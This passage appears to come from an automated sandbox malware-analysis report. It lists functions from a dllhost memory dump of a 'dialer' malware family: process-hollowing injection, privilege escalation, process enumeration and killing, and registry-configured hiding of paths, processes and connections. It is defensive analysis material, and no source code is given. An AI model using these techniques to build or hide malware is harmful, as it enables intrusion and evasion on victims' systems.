                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                          • String ID: \\.\pipe\dialercontrol
                                                          • API String ID: 2071455217-3404160161
                                                          • Opcode ID: 3209f241eb13f1ef8ec1a4decc378a022141b60f243280a494fd49a09c45b802
                                                          • Instruction ID: 4aa5465129413e2f39cc36440aa91cbf4e29d23be742ebc323825d4ea6cf5422
                                                          • Opcode Fuzzy Hash: 3209f241eb13f1ef8ec1a4decc378a022141b60f243280a494fd49a09c45b802
                                                          • Instruction Fuzzy Hash: 080148B120464082FB16EB22F8547EA6360A79DBE1F554225FB66436F5CE7CC948CB00
                                                          Function 000000014000363C Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 177 14000363c-140003690 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 178 140003692-1400036a5 K32EnumProcesses 177->178 179 1400036a7-1400036b6 178->179 180 1400036ef-1400036f8 Sleep 178->180 181 1400036b8-1400036bc 179->181 182 1400036e0-1400036eb 179->182 180->178 183 1400036be 181->183 184 1400036cf-1400036d2 call 140003198 181->184 182->180 185 1400036c2-1400036c7 183->185 188 1400036d6 184->188 186 1400036c9-1400036cd 185->186 187 1400036da-1400036de 185->187 186->184 186->185 187->181 187->182 188->187
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                          • String ID:
                                                          • API String ID: 3676546796-0
                                                          • Opcode ID: c96deb0488732d85c0e234732b40ab3daafc8955a2b60271e324f420789b4ec5
                                                          • Instruction ID: 932927f610c79799a7423f6de90e0e5c96436069bf88993b9f6edd8e186454c1
                                                          • Opcode Fuzzy Hash: c96deb0488732d85c0e234732b40ab3daafc8955a2b60271e324f420789b4ec5
                                                          • Instruction Fuzzy Hash: B81172B270061196E716DB17F81476A76A6F7C9FC1F558028EF8207B78CE3AD884CB00
                                                          Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                          • String ID:
                                                          • API String ID: 1323846700-0
                                                          • Opcode ID: 9ff41f5b47486c21fa891594cf0c33ae277b6b992257bec1fa520ef4309fdbd8
                                                          • Instruction ID: c66517cf2b2c161b5e7adf19ff96308ebd974c614c1f63983815515aa541087b
                                                          • Opcode Fuzzy Hash: 9ff41f5b47486c21fa891594cf0c33ae277b6b992257bec1fa520ef4309fdbd8
                                                          • Instruction Fuzzy Hash: DD114CB1B0564086FB16DF27B84439A66A1EB8DBD4F488028FF0903777EE39C486C704
                                                          Function 0000000140002D40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 201 140002d40-140002d44 call 140002d54 203 140002d49-140002d4b ExitProcess 201->203
                                                          APIs
                                                            • Part of subcall function 0000000140002D54: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002D7C
                                                            • Part of subcall function 0000000140002D54: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002D8C
                                                            • Part of subcall function 0000000140002D54: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002DA6
                                                            • Part of subcall function 0000000140002D54: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DBD
                                                            • Part of subcall function 0000000140002D54: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DF5
                                                            • Part of subcall function 0000000140002D54: GetLastError.KERNEL32 ref: 0000000140002DFF
                                                            • Part of subcall function 0000000140002D54: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E08
                                                            • Part of subcall function 0000000140002D54: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E31
                                                            • Part of subcall function 0000000140002D54: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E61
                                                            • Part of subcall function 0000000140002D54: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E91
                                                            • Part of subcall function 0000000140002D54: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EA5
                                                            • Part of subcall function 0000000140002D54: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EB3
                                                            • Part of subcall function 0000000140002D54: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EC6
                                                            • Part of subcall function 0000000140002D54: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002ED4
                                                          • ExitProcess.KERNEL32 ref: 0000000140002D4B
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                          • String ID:
                                                          • API String ID: 2472495637-0
                                                          • Opcode ID: 6a20d8ef6d5d0a33946017a04688fae3853965e8bdf45be2cba163fde7849c19
                                                          • Instruction ID: 59e064767c250cdef6e9f59bcc282425e560d761e872fe105b4542e7c77ad29f
                                                          • Opcode Fuzzy Hash: 6a20d8ef6d5d0a33946017a04688fae3853965e8bdf45be2cba163fde7849c19
                                                          • Instruction Fuzzy Hash: E7A002B0A1159041DA09B77674553D91561575C741F100415611547172DD7844954655

                                                          Non-executed Functions

                                                          Function 00000001400031D8 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236registrymemoryfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 261 1400031d8-1400031f9 262 1400033f1-1400033f7 261->262 263 1400031ff 261->263 266 14000356d-140003591 ReadFile 262->266 267 1400033fd-140003400 262->267 264 140003205-14000320b 263->264 265 14000335f-140003397 GetProcessHeap HeapAlloc K32EnumProcesses 263->265 268 140003211-140003214 264->268 269 140003356-140003358 ExitProcess 264->269 270 140003626-140003638 265->270 274 14000339d-1400033ae 265->274 266->270 271 140003597-14000359e 266->271 272 140003563-140003568 call 140001f7c 267->272 273 140003406-14000340c 267->273 276 14000321a-14000321d 268->276 277 1400032be-1400032e9 RegOpenKeyExW 268->277 271->270 278 1400035a4-1400035df GetProcessHeap HeapAlloc call 140001cf0 271->278 272->270 279 140003412-140003415 273->279 280 140003508-14000351b call 1400020fc 273->280 274->270 281 1400033b4-1400033ea call 140001860 * 2 274->281 286 140003223-140003226 276->286 287 1400032af-1400032b9 276->287 282 140003327-140003351 call 14000217c * 2 call 140001f7c call 1400017a0 call 14000200c 277->282 283 1400032eb-140003321 RegDeleteValueW * 3 277->283 304 1400035e1-1400035e7 278->304 305 140003612-140003620 GetProcessHeap HeapFree 278->305 289 140003454-140003465 call 1400020fc 279->289 290 140003417-14000341d 279->290 280->270 307 140003521-140003530 call 1400020fc 280->307 316 1400033ec 281->316 282->270 283->282 295 1400032a2-1400032aa 286->295 296 140003228-14000322e 286->296 287->270 289->270 308 14000346b-14000348d ReadFile 289->308 290->270 298 140003423-14000344d call 140002c64 call 140002c90 ExitProcess 290->298 295->270 296->270 303 140003234-140003258 ReadFile 296->303 303->270 311 14000325e-140003265 303->311 304->305 312 1400035e9-1400035fb 304->312 305->270 307->270 329 140003536-14000355e ShellExecuteW 307->329 308->270 315 140003493-14000349a 308->315 311->270 318 14000326b-14000329d call 140001860 * 2 311->318 319 140003601-140003609 312->319 320 1400035fd-1400035ff 312->320 315->270 323 1400034a0-1400034de GetProcessHeap HeapAlloc ReadFile 315->323 316->270 318->270 319->305 327 14000360b 319->327 320->319 326 14000360d call 140001eec 320->326 323->305 330 1400034e4-1400034f0 323->330 326->305 327->312 329->270 330->305 334 1400034f6-140003503 call 140002434 330->334 334->305
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                                          • String ID: SOFTWARE$dialerdll32$dialerdll64$dialerstager$dialersvc32$dialersvc64$open
                                                          • API String ID: 4225498131-1247716241
                                                          • Opcode ID: 6e476a2e5b1b3ef1dbd84d89780c000ad454430e2c58884dce881c51901cee02
                                                          • Instruction ID: e08a93284e424f9f2f03302153dd23542788a9e373c29e46626a4198fc3bbd5f
                                                          • Opcode Fuzzy Hash: 6e476a2e5b1b3ef1dbd84d89780c000ad454430e2c58884dce881c51901cee02
                                                          • Instruction Fuzzy Hash: E0B128F1604A8096EB7BDF27F8543EA22A9F74C7C4F458125BB0A47AB6DE798605C700
                                                          Function 0000000140002434 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 324injectionthreadmemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 343 140002434-140002465 344 140002922 343->344 345 14000246b-140002478 343->345 348 140002924-140002937 344->348 346 14000247a-140002484 345->346 347 140002490 345->347 346->344 349 14000248a-14000248e 346->349 350 140002493-140002496 347->350 349->350 351 1400024d5-1400024d8 350->351 352 140002498-1400024b6 call 1400020cc 350->352 353 1400024de-14000253a CreateProcessW 351->353 352->344 367 1400024bc-1400024c8 352->367 356 1400028d7-1400028df 353->356 357 140002540-140002557 353->357 358 1400028e1-1400028f2 OpenProcess 356->358 359 1400028ff 356->359 360 140002718-140002755 call 1400020cc VirtualAllocEx 357->360 361 14000255d-14000259b call 1400020cc VirtualAllocEx 357->361 363 140002902-14000290d 358->363 364 1400028f4-1400028f9 TerminateProcess 358->364 359->363 374 1400028d1 360->374 375 14000275b-140002777 WriteProcessMemory 360->375 361->374 376 1400025a1-1400025bd WriteProcessMemory 361->376 363->344 368 14000290f-140002916 363->368 364->359 367->344 371 1400024ce 367->371 368->353 371->351 374->356 375->374 377 14000277d-1400027a1 VirtualProtectEx 375->377 376->374 378 1400025c3-1400025e7 VirtualProtectEx 376->378 377->374 379 1400027a7-1400027b5 377->379 378->374 380 1400025ed-1400025fb 378->380 383 140002846-140002865 VirtualAlloc 379->383 384 1400027bb 379->384 381 140002601 380->381 382 14000268c-1400026ab VirtualAlloc 380->382 385 140002604-140002626 WriteProcessMemory 381->385 382->374 387 1400026b1-1400026c8 GetThreadContext 382->387 383->374 388 140002867-14000287d Wow64GetThreadContext 383->388 386 1400027be-1400027e0 WriteProcessMemory 384->386 385->374 390 14000262c-140002637 385->390 386->374 391 1400027e6-1400027f1 386->391 387->374 392 1400026ce-1400026f2 WriteProcessMemory 387->392 388->374 389 14000287f-1400028a1 WriteProcessMemory 388->389 389->374 393 1400028a3-1400028b7 Wow64SetThreadContext 389->393 394 140002639-14000263d 390->394 395 14000263f 390->395 396 1400027f3-1400027f7 391->396 397 1400027f9 391->397 392->374 398 1400026f8-140002713 SetThreadContext 392->398 399 1400028bd-1400028bf 393->399 400 140002643-140002672 call 140002938 VirtualProtectEx 394->400 395->400 401 1400027fd-14000282c call 140002938 VirtualProtectEx 396->401 397->401 398->399 399->374 402 1400028c1-1400028cf ResumeThread 399->402 400->374 408 140002678-140002686 400->408 401->374 409 140002832-140002840 401->409 402->374 405 14000291b-140002920 402->405 405->348 408->382 408->385 409->383 409->386
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$CreateOpenResumeTerminate
                                                          • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                          • API String ID: 1423830022-1371749706
                                                          • Opcode ID: bb03c724c0a37b745e04d1c2cc94b97180df235d5c9c7911ccdb9c72fcca1860
                                                          • Instruction ID: 66eadde3e23c78db0b2c2a162faeb5bceed69f312705dc0718e950d303e6fa69
                                                          • Opcode Fuzzy Hash: bb03c724c0a37b745e04d1c2cc94b97180df235d5c9c7911ccdb9c72fcca1860
                                                          • Instruction Fuzzy Hash: 94D17EB670164187EB61CB67F84479AB7A0FB88BD4F004025EF8947BA4DF78D599CB04
                                                          Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136memoryregistrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                          • Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
                                                          • Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                          • Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700
                                                          Function 0000000140001514 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 3993315683-2879589442
                                                          • Opcode ID: 2b309bef933cfa78f1970bf9c63780987827e412de03e182df68e362c732813e
                                                          • Instruction ID: 6d7d95916604e4ffecc7df06e5d7207a05ffde36480a44705d0775a9d4fcdff1
                                                          • Opcode Fuzzy Hash: 2b309bef933cfa78f1970bf9c63780987827e412de03e182df68e362c732813e
                                                          • Instruction Fuzzy Hash: 6871D6B6310A5086EB12EF66F8507DD23A4FB88BC8F016115FB4D97A7ADE38C554C744
                                                          Function 000000014000217C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                          • String ID:
                                                          • API String ID: 4184240511-0
                                                          • Opcode ID: 52a031b336cdca2811222aac7cadf92182542813affb2ed5c5bed703cbbb13aa
                                                          • Instruction ID: d557f572b548448d46b4b4e400aa3a3f0eed60a23b27f74265f55533597505c8
                                                          • Opcode Fuzzy Hash: 52a031b336cdca2811222aac7cadf92182542813affb2ed5c5bed703cbbb13aa
                                                          • Instruction Fuzzy Hash: D14148B2700A859AE711CF6AE8843DD73B1FB89B99F445225FF0A43A69DF38C159C304
                                                          Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                          • Instruction ID: 42b997484051ce9e6daf6bc3104cf1544be02307d9272190f1dec121864cc25c
                                                          • Opcode Fuzzy Hash: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                          • Instruction Fuzzy Hash: E1412AB2214B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                          Function 00000001400017A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Delete$CloseEnumOpen
                                                          • String ID: SOFTWARE\dialerconfig
                                                          • API String ID: 3013565938-461861421
                                                          • Opcode ID: 3546dc44df7e8b158bd6bb68c849f6718ea14c1894578f294c0a39a5e3694e51
                                                          • Instruction ID: 46bba928c240728d338613b8de0f0c529c8f41473f23169f90678cf934e6a2b6
                                                          • Opcode Fuzzy Hash: 3546dc44df7e8b158bd6bb68c849f6718ea14c1894578f294c0a39a5e3694e51
                                                          • Instruction Fuzzy Hash: 891170B2614A8485E762CF26F8447E923B4F78C7D8F405205EB5D0BAA9DF7CC258CB18
                                                          Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: 73bbda701e0c7dde8a9bb72d8052321e3a2b93cd57bfc5b7ac7be5e90a89b24a
                                                          • Instruction ID: bfc98151d4b55344812eebf6c0d33986cba51fe62d4fd4ad2f52b553ca81b4e9
                                                          • Opcode Fuzzy Hash: 73bbda701e0c7dde8a9bb72d8052321e3a2b93cd57bfc5b7ac7be5e90a89b24a
                                                          • Instruction Fuzzy Hash: 4D015AB2600A80D6E705EF67F90438A77A0F78CBC4F494425BB994373ADE38C051C744
                                                          Function 00000001400020CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: ntdll.dll
                                                          • API String ID: 1646373207-2227199552
                                                          • Opcode ID: 194e60043ded67e07100df29ab3cf77ef87a9a245bef3bebfeeac3078f3da2c5
                                                          • Instruction ID: 25cfabea84f4b80a2e2eb0d312c031e38d099179bfd8722b5fa94ad88c6eb4a5
                                                          • Opcode Fuzzy Hash: 194e60043ded67e07100df29ab3cf77ef87a9a245bef3bebfeeac3078f3da2c5
                                                          • Instruction Fuzzy Hash: 71D0C9F871260182EF2AEB6778553E152515B6DBD5F4940209F0647772DE38C0D48218
                                                          Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                          • Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
                                                          • Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                          • Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750
                                                          Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                          • Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
                                                          • Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                          • Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24

                                                          Execution Graph

                                                          Execution Coverage:2.7%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:1396
                                                          Total number of Limit Nodes:14
